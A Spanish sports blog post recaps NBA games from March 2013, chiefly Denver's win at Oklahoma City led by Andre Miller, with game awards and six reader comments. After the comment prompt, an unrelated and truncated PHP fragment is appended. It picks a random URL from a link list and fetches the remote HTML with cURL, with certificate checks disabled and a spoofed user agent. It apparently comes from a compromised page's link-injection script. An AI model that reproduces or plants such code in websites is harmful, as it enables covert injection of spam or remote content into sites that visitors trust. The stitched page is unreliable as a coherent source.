La Crónica: Are Denver Nuggets for real?

20 de March de 2013 por txusma

Siempre habíamos comentado que los Nuggets eran un equipo muy peligroso en casa pero nos costaba imaginárnoslos dando la cara fuera de casa contra un rival de enjundia. Tras vencer hace dos noches en la prórroga a los correosos Bulls, ayer dieron un soberano golpe de autoridad asaltando el Chesapeake Energy Arena de Oklahoma. Lo hicieron de la mano de sus 2 bases, Ty Lawson y, sobretodo Andre Miller. El jugador, que ayer cumplía 37 años, cuajó el mejor partido de la temporada tras anotar 20 puntos, repartir 9 asistencias y coger 7 rebotes en 23 minutos. Fue una lección de veteranía que empezó con una arenga a sus compañeros al inicio del partido y acabó con 13 puntos en el último cuarto. Era la noche de Miller y los Thunder no pudieron hacer nada (114-104). Ya son 13 las victorias consecutivas de Denver, la mejor racha de la historia de la franquicia y la tercera mejor de la temporada (tras las 23 de Miai y las 17 de los Clippers). Ahora les esperan unos partidos sencillos. La próxima piedra de toque llegará en una semana, en el Alamo Dome. Como les dé por ganar, habrá que replantearse algunas apuestas.

La lucha por la tercera plaza del Oeste se aprieta con la sorprendente derrota de los Clippers ante los Kings. En el último cuarto, una gran defensa de los de Sacramento más la explosión de un Toney Douglas que clavó 17 puntos, decantaron la balanza a favor de los de casa (). Toque de atención para los Clippers que tras perder 4 de sus últimos 7 partidos, están dejando malas sensaciones (101-116).

En el Este, victoria de los Pacers ante Orlando en un partido sin historia debido al poco acierto de los de Florida (73-95). La dura defensa de Indiana no permitió ni un tiro fácil y todos los titulares se quedaron por debajo del 25% de acierto en el tiro. Finalmente, los Bucks se impusieron a los Blazers en un partido que se les puso de cara en el segundo cuarto en el que dejaron a Portland en 8 puntos (95-102). Brandon Jennings y Monta Ellis fueron los mejores. 

PREMIOS

MVP: 23 minutos necesitó Andre Miller para anotar 20 puntos, repartir 9 asistencias y coger 7 rebotes. A sus 37 años fue el mejor de un equipo que ha hecho de correr su forma de vida.

Rookie: Esta vez Damian Lillard tuvo un “mal” partido y se quedó en 8 puntos y 11 asistencias. Mo Harkless anotó 10 puntos, cogió 8 rebotes y robó 4 balones.

Sorpresa: Toney Douglas apareció de la nada para anotar 17 de sus 19 puntos en el último cuarto y dar la victoria a los Kings sobre los Clippers. Tyler Hansbrough se fue a los 14 puntos y 14 rebotes en ausencia de David West.

Decepción: Terrible partido de los titulares de Orlando, sobretodo de Jameer Nelson que solo pudo repartir 1 asistencia y falló 11 de sus 13 lanzamientos a canasta.

Esfuerzo en vano: Kevin Durant tuvó que hincar la rodilla ante Andre Miller. Sus 34 puntos, 7 rebotes, 5 asistencias y 2 tapones se quedaron cortos.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Pues Denver sigue escalando y ya tiene ahí la tercera posición Equipo super intenso q saca del partido a los rivales y con muchas alternativas Pueden ser el gran animador de PO en el Oeste Y que gran jugador es Andre El Guitarrista Miller El pone la experiencia q necesitaran en PO Los Thunder siguen con problemas en ataque y Ibaka ha dejado de contar ahí y lo notan Tendran q dar una marcha mas si quieren optar al anillo

      Citar

  2. Simon dice:
    #2

    para mi si son reales, me gustan mucho y creo que van a llegar muy muy lejos en post temporada.

      Citar

  3. oli dice:
    #3

    A mi tb me gustan estos nuggets, pero en los últimos a?os ha habido alguna final con un equipo sin un jugador franquicia?? Ese que en los momentos calientes coje el balón para jugarsela y en este equipo no está definido

      Citar

  4. Sempren dice:
    #4

    Otros años solía hacerlo Gallinari, aunque fuese a base de penetraciones sin mucho sentido pero de las que casi siempre sacaba tiros libres, que metía con muy buenos porcentajes. Muchas veces acababa con 10 tiros libres o por ahí

      Citar

  5. Futurman dice:
    #5

    Este año está Lawson como jugador franquicia y luego hay gente con los cojones pelados como Iggy y Miller. Luego los demás son mocos que machacarán a correr a cualquiera así que mimbres tienen.

      Citar

  6. Ruxixón dice:
    #6

    Que partido el de Cleveland señores….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>